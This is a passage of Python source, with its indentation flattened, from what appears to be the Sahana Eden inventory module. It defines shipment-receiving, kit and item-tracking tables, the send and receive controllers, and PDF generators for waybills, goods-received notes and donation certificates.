writable=show_req_ref
),
person_id(name = "sender_id",
label = T("Sent By Person"),
ondelete = "SET NULL",
comment = self.pr_person_comment(child="sender_id"),
),
person_id(name = "recipient_id",
label = T("Received By"),
ondelete = "SET NULL",
default = auth.s3_logged_in_person(),
comment = self.pr_person_comment(child="recipient_id")),
Field("status", "integer",
requires = IS_EMPTY_OR(
IS_IN_SET(shipment_status)
),
represent = lambda opt: \
shipment_status.get(opt, UNKNOWN_OPT),
default = SHIP_STATUS_IN_PROCESS,
label = T("Status"),
writable = False,
),
Field("grn_status", "integer",
requires = IS_EMPTY_OR(
IS_IN_SET(ship_doc_status)
),
represent = lambda opt: \
ship_doc_status.get(opt, UNKNOWN_OPT),
default = SHIP_DOC_PENDING,
widget = radio_widget,
label = T("%(GRN)s Status") % \
dict(GRN=settings.get_inv_recv_shortname()),
comment = DIV(_class="tooltip",
_title="%s|%s" % \
(T("%(GRN)s Status") % dict(GRN=settings.get_inv_recv_shortname()),
T("Has the %(GRN)s (%(GRN_name)s) form been completed?") % \
dict(GRN=settings.get_inv_recv_shortname(),
GRN_name=settings.get_inv_recv_form_name()))),
),
Field("cert_status", "integer",
requires = IS_EMPTY_OR(
IS_IN_SET(ship_doc_status)
),
represent = lambda opt: \
ship_doc_status.get(opt, UNKNOWN_OPT),
default = SHIP_DOC_PENDING,
widget = radio_widget,
label = T("Certificate Status"),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Certificate Status"),
T("Has the Certificate for receipt of the shipment been given to the sender?"))),
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
inv_recv_crud_strings()
if settings.get_inv_shipment_name() == "order":
recv_id_label = T("Order")
else:
recv_id_label = T("Receive Shipment")
# Reusable Field
recv_id = S3ReusableField("recv_id", "reference %s" % tablename,
label = recv_id_label,
ondelete = "RESTRICT",
represent = self.inv_recv_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "inv_recv.id",
self.inv_recv_represent,
orderby="inv_recv.date",
sort=True)),
sortby = "date",
)
# Search Method
if settings.get_inv_shipment_name() == "order":
recv_search_comment = T("Search for an order by looking for text in any field.")
recv_search_date_field = "eta"
recv_search_date_comment = T("Search for an order expected between these dates")
else:
recv_search_comment = T("Search for a shipment by looking for text in any field.")
recv_search_date_field = "date"
recv_search_date_comment = T("Search for a shipment received between these dates")
# @todo: make lazy_table
table = db[tablename]
filter_widgets = [
S3TextFilter(["sender_id$first_name",
"sender_id$middle_name",
"sender_id$last_name",
"comments",
"from_site_id$name",
"recipient_id$first_name",
"recipient_id$middle_name",
"recipient_id$last_name",
"site_id$name",
"recv_ref",
"send_ref",
"purchase_ref",
],
label = T("Search"),
comment = recv_search_comment,
),
S3DateFilter(recv_search_date_field,
label = table[recv_search_date_field].label,
comment = recv_search_date_comment,
hidden = True,
),
S3OptionsFilter("site_id",
label = SITE_LABEL,
cols = 2,
hidden = True,
),
S3OptionsFilter("status",
label = T("Status"),
cols = 2,
hidden = True,
),
#S3OptionsFilter("grn_status",
#label = T("GRN Status"),
#cols = 2,
#hidden = True,
#),
#S3OptionsFilter("cert_status",
#label = T("Certificate Status"),
#cols = 2,
#hidden = True,
#),
]
# Redirect to the Items tabs after creation
recv_item_url = URL(c="inv", f="recv", args=["[id]",
"track_item"])
configure(tablename,
# it shouldn't be possible for the user to delete a send item
deletable=False,
list_fields = ["id",
"recv_ref",
"send_ref",
"purchase_ref",
"recipient_id",
"organisation_id",
"from_site_id",
"site_id",
"date",
"type",
"status",
"req_ref",
"sender_id",
"comments"
],
mark_required = ("from_site_id", "organisation_id"),
onvalidation = self.inv_recv_onvalidation,
onaccept = self.inv_recv_onaccept,
filter_widgets = filter_widgets,
create_next = recv_item_url,
update_next = recv_item_url,
orderby="inv_recv.date desc",
sortby=[[6, "desc"], [1, "asc"]])
# Components
add_components(tablename,
inv_track_item = "recv_id",
)
# Custom methods
# Print Forms
set_method("inv", "recv",
method = "form",
action = self.inv_recv_form)
set_method("inv", "recv",
method = "cert",
action = self.inv_recv_donation_cert )
set_method("inv", "recv",
method = "timeline",
action = self.inv_timeline)
# ---------------------------------------------------------------------
# Kits
# - actual Kits in stock
#
tablename = "inv_kit"
define_table(tablename,
Field("site_id", "reference org_site",
label = T("By %(site)s") % dict(site=SITE_LABEL),
requires = IS_ONE_OF(db, "org_site.site_id",
lambda id, row: \
org_site_represent(id, row,
show_link=False),
instance_types = auth.org_site_types,
updateable = True,
sort=True,
),
default = user.site_id if is_logged_in() else None,
readable = True,
writable = True,
widget = S3SiteAutocompleteWidget(),
represent = org_site_represent,
comment = S3AddResourceLink(
c="inv",
f="warehouse",
label=T("Create Warehouse"),
title=T("Warehouse"),
tooltip=T("Type the name of an existing site OR Click 'Create Warehouse' to add a new warehouse.")),
),
item_id(label = T("Kit"),
requires = IS_ONE_OF(db, "supply_item.id",
self.supply_item_represent,
filterby="kit",
filter_opts=(True,),
sort=True),
widget = S3AutocompleteWidget("supply", "item",
filter="item.kit=1"),
# Needs better workflow as no way to add the Kit Items
#comment = S3AddResourceLink(
# c="supply",
# f="item",
# label=T("Create Kit"),
# title=T("Kit"),
# tooltip=T("Type the name of an existing catalog kit OR Click 'Create Kit' to add a kit which is not in the catalog.")),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Kit"),
T("Type the name of an existing catalog kit"))),
),
Field("quantity", "double",
label = T("Quantity"),
represent = lambda v, row=None: \
IS_FLOAT_AMOUNT.represent(v, precision=2)
),
s3_date(comment = DIV(_class="tooltip",
_title="%s|%s" % \
(T("Date Repacked"),
T("Will be filled automatically when the Item has been Repacked")))
),
req_ref(writable = True),
person_id(name = "repacked_id",
label = T("Repacked By"),
ondelete = "SET NULL",
default = auth.s3_logged_in_person(),
#comment = self.pr_person_comment(child="repacked_id")),
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_KIT = T("Create Kit")
crud_strings[tablename] = Storage(
label_create = ADD_KIT,
title_display = T("Kit Details"),
title_list = T("Kits"),
title_update = T("Kit"),
label_list_button = T("List Kits"),
label_delete_button = T("Delete Kit"),
msg_record_created = T("Kit Created"),
msg_record_modified = T("Kit updated"),
msg_record_deleted = T("Kit canceled"),
msg_list_empty = T("No Kits"))
# Resource configuration
configure(tablename,
list_fields = ["site_id",
"req_ref",
"quantity",
"date",
"repacked_id"],
onvalidation = self.inv_kit_onvalidate,
onaccept = self.inv_kit_onaccept,
)
# ---------------------------------------------------------------------
# Tracking Items
#
inv_item_status_opts = self.inv_item_status_opts
tablename = "inv_track_item"
define_table(tablename,
organisation_id(name = "track_org_id",
label = T("Shipping Organization"),
ondelete = "SET NULL",
readable = False,
writable = False
),
inv_item_id(name="send_inv_item_id",
ondelete = "RESTRICT",
# Local Purchases don't have this available
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "inv_inv_item.id",
self.inv_item_represent,
orderby="inv_inv_item.id",
sort=True)),
script = '''
$.filterOptionsS3({
'trigger':'send_inv_item_id',
'target':'item_pack_id',
'lookupResource':'item_pack',
'lookupPrefix':'supply',
'lookupURL':S3.Ap.concat('/inv/inv_item_packs/'),
'msgNoRecords':i18n.no_packs,
'fncPrep':S3.supply.fncPrepItem,
'fncRepresent':S3.supply.fncRepresentItem
})'''),
item_id(ondelete = "RESTRICT"),
item_pack_id(ondelete = "SET NULL"),
# Now done as a VirtualField instead (looks better & updates closer to real-time, so less of a race condition)
#Field("req_quantity", "double",
# # This isn't the Quantity requested, but rather the quantity still needed
# label = T("Quantity Needed"),
# readable = False,
# writable = False),
Field("quantity", "double", notnull=True,
label = T("Quantity Sent"),
requires = IS_NOT_EMPTY()),
Field("recv_quantity", "double",
label = T("Quantity Received"),
represent = self.qnty_recv_repr,
readable = False,
writable = False),
Field("return_quantity", "double",
label = T("Quantity Returned"),
represent = self.qnty_recv_repr,
readable = False,
writable = False),
Field("pack_value", "double",
label = T("Value per Pack")),
s3_currency(),
s3_date("expiry_date",
label = T("Expiry Date")),
# The bin at origin
Field("bin", length=16,
label = T("Bin"),
represent = s3_string_represent),
inv_item_id(name="recv_inv_item_id",
label = T("Receiving Inventory"),
required = False,
readable = False,
writable = False,
ondelete = "RESTRICT"),
# The bin at destination
Field("recv_bin", length=16,
label = T("Add to Bin"),
readable = False,
writable = False,
represent = s3_string_represent,
widget = S3InvBinWidget("inv_track_item"),
comment = DIV(_class="tooltip",
_title="%s|%s" % \
(T("Bin"),
T("The Bin in which the Item is being stored (optional)."))),
),
Field("item_source_no", "string", length=16,
label = self.inv_itn_label,
represent = s3_string_represent),
# original donating org
organisation_id(name = "supply_org_id",
label = T("Supplier/Donor"),
ondelete = "SET NULL"),
# which org owns this item
organisation_id(name = "owner_org_id",
label = T("Owned By (Organization/Branch)"),
ondelete = "SET NULL"),
Field("inv_item_status", "integer",
label = T("Item Status"),
requires = IS_EMPTY_OR(
IS_IN_SET(inv_item_status_opts)
),
represent = lambda opt: \
inv_item_status_opts.get(opt, UNKNOWN_OPT),
default = 0,),
Field("status", "integer",
label = T("Item Tracking Status"),
required = True,
requires = IS_IN_SET(tracking_status),
default = 1,
represent = lambda opt: tracking_status[opt],
writable = False),
self.inv_adj_item_id(ondelete = "RESTRICT"), # any adjustment record
# send record
send_id(),
# receive record
recv_id(),
req_item_id(readable=False,
writable=False),
Field.Method("total_value",
self.inv_track_item_total_value),
Field.Method("pack_quantity",
self.supply_item_pack_quantity(tablename=tablename)),
s3_comments(),
*s3_meta_fields()
)
# CRUD strings
ADD_TRACK_ITEM = T("Add Item to Shipment")
crud_strings[tablename] = Storage(
label_create = ADD_TRACK_ITEM,
title_display = T("Shipment Item Details"),
title_list = T("Shipment Items"),
title_update = T("Edit Shipment Item"),
label_list_button = T("List Shipment Items"),
label_delete_button = T("Delete Shipment Item"),
msg_record_created = T("Item Added to Shipment"),
msg_record_modified = T("Shipment Item updated"),
msg_record_deleted = T("Shipment Item deleted"),
msg_list_empty = T("No Shipment Items"))
# Filter Widgets
filter_widgets = [
S3TextFilter(["item_id$name",
"send_id$site_id$name",
"recv_id$site_id$name",
],
label = T("Search"),
#comment = recv_search_comment,
),
S3DateFilter("send_id$date",
label = T("Sent date"),
hidden = True,
),
S3DateFilter("recv_id$date",
label = T("Received date"),
hidden = True,
),
]
# Resource configuration
configure(tablename,
list_fields = ["id",
"status",
"item_id",
(T("Weight (kg)"), "item_id$weight"),
(T("Volume (m3)"), "item_id$volume"),
"item_pack_id",
"send_id",
"recv_id",
"quantity",
"currency",
"pack_value",
"bin",
"return_quantity",
"recv_quantity",
"recv_bin",
"owner_org_id",
"supply_org_id",
],
filter_widgets = filter_widgets,
onaccept = self.inv_track_item_onaccept,
onvalidation = self.inv_track_item_onvalidate,
extra_fields = ["quantity", "pack_value", "item_pack_id"],
)
#---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(inv_send_controller = self.inv_send_controller,
inv_send_onaccept = self.inv_send_onaccept,
inv_send_process = self.inv_send_process,
inv_track_item_deleting = self.inv_track_item_deleting,
inv_track_item_onaccept = self.inv_track_item_onaccept,
)
# ---------------------------------------------------------------------
@staticmethod
def inv_track_item_total_value(row):
""" Total value of a track item """
if hasattr(row, "inv_track_item"):
row = row.inv_track_item
try:
v = row.quantity * row.pack_value
return v
except:
# not available
return current.messages["NONE"]
# ---------------------------------------------------------------------
@staticmethod
def inv_track_item_quantity_needed(row):
"""
Quantity still needed for a track item - used in Inv Send
when an Item has come from a Request
"""
if hasattr(row, "inv_track_item"):
row = row.inv_track_item
try:
req_item_id = row.req_item_id
except:
# not available
req_item_id = None
if not req_item_id:
return current.messages["NONE"]
s3db = current.s3db
ritable = s3db.req_req_item
siptable = s3db.supply_item_pack
query = (ritable.id == req_item_id) & \
(ritable.item_pack_id == siptable.id)
row = current.db(query).select(ritable.quantity,
ritable.quantity_transit,
ritable.quantity_fulfil,
siptable.quantity).first()
if row:
rim = row.req_req_item
quantity_shipped = max(rim.quantity_transit,
rim.quantity_fulfil)
quantity_needed = (rim.quantity - quantity_shipped) * \
row.supply_item_pack.quantity
else:
return current.messages["NONE"]
return quantity_needed
# ---------------------------------------------------------------------
@staticmethod
def inv_send_represent(id, row=None, show_link=True):
"""
Represent a Sent Shipment
"""
if row:
id = row.id
table = current.db.inv_send
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.inv_send
row = db(table.id == id).select(table.date,
table.send_ref,
table.to_site_id,
limitby=(0, 1)).first()
try:
send_ref_string = table.send_ref.represent(row.send_ref,
show_link=False)
to_string = table.to_site_id.represent(row.to_site_id,
show_link=False)
date_string = table.date.represent(row.date)
T = current.T
represent = "%s (%s: %s %s %s)" % (send_ref_string,
T("To"),
to_string,
T("on"),
date_string)
if show_link:
return A(represent,
_href = URL(c="inv", f="send", args=[id]))
else:
return represent
except:
return current.messages.UNKNOWN_OPT
# -------------------------------------------------------------------------
@staticmethod
def inv_send_onaccept(form):
"""
When a inv send record is created then create the send_ref.
"""
db = current.db
vars = form.vars
id = vars.id
type = vars.type
if type:
# Add all inv_items with status matching the send shipment type
# eg. Items for Dump, Sale, Reject, Surplus
inv_track_item_onaccept = current.s3db.inv_track_item_onaccept
site_id = vars.site_id
itable = db.inv_inv_item
tracktable = db.inv_track_item
query = (itable.site_id == site_id) & \
(itable.status == int(type))
rows = db(query).select()
for row in rows:
if row.quantity != 0:
# Insert inv_item to inv_track_item
inv_track_id = tracktable.insert(send_id = id,
send_inv_item_id = row.id,
item_id = row.item_id,
quantity = row.quantity,
currency = row.currency,
pack_value = row.pack_value,
expiry_date = row.expiry_date,
owner_org_id = row.owner_org_id,
supply_org_id = row.supply_org_id,
item_source_no = row.item_source_no,
item_pack_id = row.item_pack_id,
inv_item_status = row.status,
#status = TRACK_STATUS_PREPARING,
)
# Construct form.vars for inv_track_item_onaccept
vars = Storage()
vars.id = inv_track_id
vars.quantity = row.quantity
vars.item_pack_id = row.item_pack_id
vars.send_inv_item_id = row.id
# Call inv_track_item_onaccept to remove inv_item from stock
inv_track_item_onaccept(Storage(vars=vars))
stable = db.inv_send
# If the send_ref is None then set it up
record = stable[id]
if not record.send_ref:
code = current.s3db.supply_get_shipping_code(
current.deployment_settings.get_inv_send_shortname(),
record.site_id,
stable.send_ref,
)
db(stable.id == id).update(send_ref=code)
# -------------------------------------------------------------------------
@classmethod
def inv_send_controller(cls):
"""
RESTful CRUD controller for inv_send
"""
T = current.T
db = current.db
s3db = current.s3db
sendtable = s3db.inv_send
tracktable = s3db.inv_track_item
request = current.request
response = current.response
s3 = response.s3
# Limit site_id to sites the user has permissions for
error_msg = T("You do not have permission for any facility to send a shipment.")
current.auth.permitted_facilities(table=sendtable, error_msg=error_msg)
# Set Validator for checking against the number of items in the warehouse
vars = request.vars
send_inv_item_id = vars.send_inv_item_id
if send_inv_item_id:
if not vars.item_pack_id:
iitable = s3db.inv_inv_item
vars.item_pack_id = db(iitable.id == send_inv_item_id).select(iitable.item_pack_id,
limitby=(0, 1)
).first().item_pack_id
s3db.inv_track_item.quantity.requires = QUANTITY_INV_ITEM(db,
send_inv_item_id,
vars.item_pack_id)
def set_send_attr(status):
sendtable.send_ref.writable = False
if status == SHIP_STATUS_IN_PROCESS:
sendtable.send_ref.readable = False
else:
# Make all fields writable False
for field in sendtable.fields:
sendtable[field].writable = False
def set_track_attr(status):
# By default Make all fields writable False
for field in tracktable.fields:
tracktable[field].writable = False
# Hide some fields
tracktable.send_id.readable = False
tracktable.recv_id.readable = False
tracktable.bin.readable = False
tracktable.item_id.readable = False
tracktable.recv_quantity.readable = False
tracktable.return_quantity.readable = False
tracktable.expiry_date.readable = False
tracktable.owner_org_id.readable = False
tracktable.supply_org_id.readable = False
tracktable.adj_item_id.readable = False
if status == TRACK_STATUS_PREPARING:
# show some fields
tracktable.send_inv_item_id.writable = True
tracktable.item_pack_id.writable = True
tracktable.quantity.writable = True
#tracktable.req_quantity.readable = True
tracktable.comments.writable = True
# hide some fields
tracktable.currency.readable = False
tracktable.pack_value.readable = False
tracktable.item_source_no.readable = False
tracktable.inv_item_status.readable = False
elif status == TRACK_STATUS_ARRIVED:
# Shipment arrived display some extra fields at the destination
tracktable.item_source_no.readable = True
tracktable.recv_quantity.readable = True
tracktable.return_quantity.readable = True
tracktable.recv_bin.readable = True
tracktable.currency.readable = True
tracktable.pack_value.readable = True
elif status == TRACK_STATUS_RETURNING:
tracktable.return_quantity.readable = True
tracktable.return_quantity.writable = True
tracktable.currency.readable = True
tracktable.pack_value.readable = True
def prep(r):
# Default to the Search tab in the location selector
s3.gis.tab = "search"
record = db(sendtable.id == r.id).select(sendtable.status,
sendtable.req_ref,
limitby=(0, 1)
).first()
if record:
status = record.status
if status != SHIP_STATUS_IN_PROCESS:
# Now that the shipment has been sent,
# lock the record so that it can't be meddled with
s3db.configure("inv_send",
create=False,
listadd=False,
editable=False,
deletable=False,
)
if r.component:
record = r.record
values = current.deployment_settings.get_inv_track_pack_values()
if status in (SHIP_STATUS_RECEIVED, SHIP_STATUS_CANCEL):
list_fields = ["id",
"status",
"item_id",
"item_pack_id",
"bin",
"quantity",
"recv_quantity",
"return_quantity",
"owner_org_id",
"supply_org_id",
"inv_item_status",
"comments",
]
if values:
list_fields.insert(7, "pack_value")
list_fields.insert(7, "currency")
elif status == SHIP_STATUS_RETURNING:
list_fields = ["id",
"status",
"item_id",
"item_pack_id",
"quantity",
"return_quantity",
"bin",
"owner_org_id",
"supply_org_id",
"inv_item_status",
]
if values:
list_fields.insert(5, "pack_value")
list_fields.insert(5, "currency")
else:
list_fields = ["id",
"status",
"item_id",
"item_pack_id",
"quantity",
"bin",
"owner_org_id",
"supply_org_id",
"inv_item_status",
]
if values:
list_fields.insert(6, "pack_value")
list_fields.insert(6, "currency")
if record.req_ref and r.interactive:
s3db.configure("inv_track_item",
extra_fields = ["req_item_id"])
tracktable.quantity_needed = \
Field.Method("quantity_needed",
cls.inv_track_item_quantity_needed)
list_fields.insert(4, (T("Quantity Needed"),
"quantity_needed"))
s3db.configure("inv_track_item", list_fields=list_fields)
# Can only create or delete track items for a send record if the status is preparing
method = r.method
if method in ("create", "delete"):
if status != SHIP_STATUS_IN_PROCESS:
return False
if method == "delete":
return s3.inv_track_item_deleting(r.component_id)
if record.get("site_id"):
# Restrict to items from this facility only
tracktable.send_inv_item_id.requires = IS_ONE_OF(db, "inv_inv_item.id",
s3db.inv_item_represent,
filterby = "site_id",
filter_opts = (record.site_id,),
not_filterby = "quantity",
not_filter_opts = (0,),
orderby = "inv_inv_item.id",
sort = True,
)
# Hide the values that will be copied from the inv_inv_item record
if r.component_id:
track_record = db(tracktable.id == r.component_id).select(tracktable.req_item_id,
tracktable.send_inv_item_id,
tracktable.item_pack_id,
tracktable.status,
tracktable.quantity,
limitby=(0, 1)).first()
set_track_attr(track_record.status)
# If the track record is linked to a request item then
# the stock item has already been selected so make it read only
if track_record and track_record.get("req_item_id"):
tracktable.send_inv_item_id.writable = False
tracktable.item_pack_id.writable = False
stock_qnty = track_record.quantity
tracktable.quantity.comment = T("%(quantity)s in stock") % dict(quantity=stock_qnty)
tracktable.quantity.requires = QUANTITY_INV_ITEM(db,
track_record.send_inv_item_id,
track_record.item_pack_id)
# Hide the item id
tracktable.item_id.readable = False
else:
set_track_attr(TRACK_STATUS_PREPARING)
if r.interactive:
crud_strings = s3.crud_strings.inv_send
if record.status == SHIP_STATUS_IN_PROCESS:
crud_strings.title_update = \
crud_strings.title_display = T("Process Shipment to Send")
elif "site_id" in request.vars and status == SHIP_STATUS_SENT:
crud_strings.title_update = \
crud_strings.title_display = T("Review Incoming Shipment to Receive")
else:
if r.id and request.get_vars.get("received", None):
# "received" must not propagate:
del request.get_vars["received"]
# Set the items to being received
# @ToDo: Check Permissions & Avoid DB updates in GETs
db(sendtable.id == r.id).update(status = SHIP_STATUS_RECEIVED)
db(tracktable.send_id == r.id).update(status = TRACK_STATUS_ARRIVED)
req_ref = record.req_ref
if req_ref:
# Update the Request Status
rtable = s3db.req_req
req_id = db(rtable.req_ref == req_ref).select(rtable.id,
limitby=(0, 1)).first()
# Get the full list of items in the request
ritable = s3db.req_req_item
query = (ritable.req_id == req_id) & \
(ritable.deleted == False)
ritems = db(query).select(ritable.id,
ritable.item_pack_id,
ritable.quantity,
# Virtual Field
#ritable.pack_quantity,
)
# Get all Received Shipments in-system for this request
query = (sendtable.status == SHIP_STATUS_RECEIVED) & \
(sendtable.req_ref == req_ref) & \
(tracktable.send_id == r.id) & \
(tracktable.deleted == False)
sitems = db(query).select(tracktable.item_pack_id,
tracktable.quantity,
# Virtual Field
#tracktable.pack_quantity,
)
fulfil_qty = {}
for item in sitems:
item_pack_id = item.item_pack_id
if item_pack_id in fulfil_qty:
fulfil_qty[item_pack_id] += (item.quantity * item.pack_quantity())
else:
fulfil_qty[item_pack_id] = (item.quantity * item.pack_quantity())
complete = False
for item in ritems:
if item.item_pack_id in fulfil_qty:
quantity_fulfil = fulfil_qty[item.item_pack_id]
db(ritable.id == item.id).update(quantity_fulfil=quantity_fulfil)
req_quantity = item.quantity * item.pack_quantity()
if quantity_fulfil >= req_quantity:
complete = True
else:
complete = False
# Update overall Request Status
if complete:
# REQ_STATUS_COMPLETE
db(rtable.id == req_id).update(fulfil_status=2)
else:
# REQ_STATUS_PARTIAL
db(rtable.id == req_id).update(fulfil_status=1)
response.confirmation = T("Shipment received")
# else set the inv_send attributes
elif r.id:
record = db(sendtable.id == r.id).select(sendtable.status,
limitby=(0, 1)).first()
set_send_attr(record.status)
else:
set_send_attr(SHIP_STATUS_IN_PROCESS)
sendtable.send_ref.readable = False
return True
args = request.args
if len(args) > 1 and args[1] == "track_item":
# Shouldn't fail but...
# if user enters the send id then it could so wrap in a try...
try:
status = db(sendtable.id == args[0]).select(sendtable.status,
limitby=(0, 1)).status
except:
status = None
if status:
editable = False
if status == SHIP_STATUS_RETURNING:
editable = True
# remove CRUD generated buttons in the tabs
s3db.configure("inv_track_item",
create = False,
deletable = False,
editable = editable,
listadd = False,
)
s3.prep = prep
output = current.rest_controller("inv", "send",
rheader = inv_send_rheader)
return output
# ---------------------------------------------------------------------
@staticmethod
def inv_send_process():
"""
Process a Shipment
"""
request = current.request
try:
send_id = request.args[0]
except:
redirect(URL(f="send"))
T = current.T
auth = current.auth
db = current.db
s3db = current.s3db
stable = db.inv_send
session = current.session
if not auth.s3_has_permission("update", stable, record_id=send_id):
session.error = T("You do not have permission to send this shipment.")
send_record = db(stable.id == send_id).select(stable.status,
stable.sender_id,
stable.send_ref,
stable.req_ref,
stable.site_id,
stable.delivery_date,
stable.recipient_id,
stable.to_site_id,
stable.comments,
limitby=(0, 1)).first()
if send_record.status != SHIP_STATUS_IN_PROCESS:
session.error = T("This shipment has already been sent.")
tracktable = db.inv_track_item
siptable = s3db.supply_item_pack
rrtable = s3db.req_req
ritable = s3db.req_req_item
# Get the track items that are part of this shipment
query = (tracktable.send_id == send_id ) & \
(tracktable.deleted == False)
track_items = db(query).select(tracktable.req_item_id,
tracktable.quantity,
tracktable.item_pack_id)
if not track_items:
session.error = T("No items have been selected for shipping.")
if session.error:
redirect(URL(f = "send",
args = [send_id]))
# Update Send record & lock for editing
system_roles = auth.get_system_roles()
ADMIN = system_roles.ADMIN
db(stable.id == send_id).update(date = request.utcnow,
status = SHIP_STATUS_SENT,
owned_by_user = None,
owned_by_group = ADMIN)
# If this is linked to a request then update the quantity in transit
req_ref = send_record.req_ref
req_rec = db(rrtable.req_ref == req_ref).select(rrtable.id,
limitby=(0, 1)).first()
if req_rec:
req_id = req_rec.id
for track_item in track_items:
req_item_id = track_item.req_item_id
if req_item_id:
req_pack_id = db(ritable.id == req_item_id).select(ritable.item_pack_id,
limitby=(0, 1)
).first().item_pack_id
req_p_qnty = db(siptable.id == req_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
t_qnty = track_item.quantity
t_pack_id = track_item.item_pack_id
inv_p_qnty = db(siptable.id == t_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
transit_quantity = t_qnty * inv_p_qnty / req_p_qnty
db(ritable.id == req_item_id).update(quantity_transit = ritable.quantity_transit + transit_quantity)
s3db.req_update_status(req_id)
# Create a Receive record
rtable = s3db.inv_recv
recv_id = rtable.insert(sender_id = send_record.sender_id,
send_ref = send_record.send_ref,
req_ref = req_ref,
from_site_id = send_record.site_id,
eta = send_record.delivery_date,
recipient_id = send_record.recipient_id,
site_id = send_record.to_site_id,
comments = send_record.comments,
status = SHIP_STATUS_SENT,
type = 1, # 1:"Another Inventory"
)
# Change the status for all track items in this shipment to In transit
# and link to the receive record
db(tracktable.send_id == send_id).update(status = 2,
recv_id = recv_id)
session.confirmation = T("Shipment Items sent from Warehouse")
if req_rec:
session.confirmation = T("Request Status updated")
redirect(URL(f = "send",
args = [send_id, "track_item"]))
# ---------------------------------------------------------------------
@staticmethod
def inv_send_form(r, **attr):
"""
Generate a PDF of a Waybill
"""
db = current.db
table = db.inv_send
tracktable = db.inv_track_item
table.date.readable = True
record = db(table.id == r.id).select(table.send_ref,
limitby=(0, 1)).first()
send_ref = record.send_ref
# hide the inv_item field
tracktable.send_inv_item_id.readable = False
tracktable.recv_inv_item_id.readable = False
T = current.T
list_fields = [(T("Item Code"), "item_id$code"),
"item_id",
(T("Weight (kg)"), "item_id$weight"),
(T("Volume (m3)"), "item_id$volume"),
"bin",
"item_source_no",
"item_pack_id",
"quantity",
]
settings = current.deployment_settings
if r.record.req_ref:
# This Shipment relates to a request
# - show the req_item comments
list_fields.append("req_item_id$comments")
if settings.get_inv_track_pack_values():
list_fields + ["currency",
"pack_value",
]
from s3.s3export import S3Exporter
exporter = S3Exporter().pdf
return exporter(r.resource,
request = r,
method = "list",
pdf_componentname = "track_item",
pdf_title = settings.get_inv_send_form_name(),
pdf_filename = send_ref,
list_fields = list_fields,
pdf_hide_comments = True,
pdf_header_padding = 12,
pdf_footer = inv_send_pdf_footer,
pdf_paper_alignment = "Landscape",
pdf_table_autogrow = "B",
**attr
)
# ---------------------------------------------------------------------
@staticmethod
def inv_recv_represent(id, row=None, show_link=True):
"""
Represent a Received Shipment
"""
if row:
id = row.id
table = current.db.inv_recv
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.inv_recv
row = db(table.id == id).select(table.date,
table.recv_ref,
table.from_site_id,
table.organisation_id,
limitby=(0, 1)).first()
recv_ref_string = table.send_ref.represent(row.recv_ref,
show_link=False)
if row.from_site_id:
from_string = table.from_site_id.represent(row.from_site_id,
show_link=False)
else:
from_string = table.organisation_id.represent(row.organisation_id,
show_link=False)
date_string = table.date.represent(row.date)
T = current.T
represent = "%s (%s: %s %s %s)" % (recv_ref_string,
T("From"),
from_string,
T("on"),
date_string)
if show_link:
return A(represent,
_href = URL(c="inv", f="recv", args=[id]))
else:
return represent
# -------------------------------------------------------------------------
@staticmethod
def inv_recv_onaccept(form):
"""
When a inv recv record is created then create the recv_ref.
"""
db = current.db
rtable = db.inv_recv
# If the recv_ref is None then set it up
id = form.vars.id
record = rtable[id]
if not record.recv_ref:
# AR Number
code = current.s3db.supply_get_shipping_code(
current.deployment_settings.get_inv_recv_shortname(),
record.site_id,
rtable.recv_ref,
)
db(rtable.id == id).update(recv_ref = code)
# -------------------------------------------------------------------------
@staticmethod
def inv_send_onvalidation(form):
"""
Check that either organisation_id or to_site_id are filled according to the type
"""
vars = form.vars
if not vars.to_site_id and not vars.organisation_id:
error = current.T("Please enter a %(site)s OR an Organization") % \
dict(site=current.deployment_settings.get_org_site_label())
errors = form.errors
errors.to_site_id = error
errors.organisation_id = error
# -------------------------------------------------------------------------
@staticmethod
def inv_recv_onvalidation(form):
"""
Check that either organisation_id or from_site_id are filled according to the type
@ToDo: lookup the type values from s3cfg.py instead of hardcoding it
"""
type = form.vars.type and int(form.vars.type)
if type == 11 and not form.vars.from_site_id:
# Internal Shipment needs from_site_id
form.errors.from_site_id = current.T("Please enter a %(site)s") % \
dict(site=current.deployment_settings.get_org_site_label())
if type >= 32 and not form.vars.organisation_id:
# Internal Shipment needs from_site_id
form.errors.organisation_id = current.T("Please enter an Organization/Supplier")
# ---------------------------------------------------------------------
@staticmethod
def inv_recv_form (r, **attr):
"""
Generate a PDF of a GRN (Goods Received Note)
"""
T = current.T
db = current.db
table = db.inv_recv
track_table = db.inv_track_item
table.date.readable = True
table.site_id.readable = True
track_table.recv_quantity.readable = True
table.site_id.label = T("By %(site)s") % dict(site=current.deployment_settings.get_inv_facility_label())
table.site_id.represent = current.s3db.org_site_represent
record = table[r.id]
recv_ref = record.recv_ref
list_fields = ["item_id",
(T("Weight (kg)"), "item_id$weight"),
(T("Volume (m3)"), "item_id$volume"),
"item_source_no",
"item_pack_id",
"quantity",
"recv_quantity",
"currency",
"pack_value",
"bin"
]
from s3.s3export import S3Exporter
exporter = S3Exporter().pdf
return exporter(r.resource,
request = r,
method = "list",
pdf_title = T(current.deployment_settings.get_inv_recv_form_name()),
pdf_filename = recv_ref,
list_fields = list_fields,
pdf_hide_comments = True,
pdf_componentname = "track_item",
pdf_header_padding = 12,
pdf_footer = inv_recv_pdf_footer,
pdf_table_autogrow = "B",
pdf_paper_alignment = "Landscape",
**attr
)
# -------------------------------------------------------------------------
@staticmethod
def inv_recv_donation_cert (r, **attr):
"""
Generate a PDF of a Donation certificate
"""
db = current.db
table = db.inv_recv
table.date.readable = True
table.type.readable = False
field = table.site_id
field.readable = True
field.label = current.T("By %(site)s") % dict(site=current.deployment_settings.get_inv_facility_label())
field.represent = current.s3db.org_site_represent
record = table[r.id]
site_id = record.site_id
site = field.represent(site_id, False)
from s3.s3export import S3Exporter
exporter = S3Exporter().pdf
return exporter(r.resource,
request=r,
method="list",
pdf_title="Donation Certificate",
pdf_filename="DC-%s" % site,
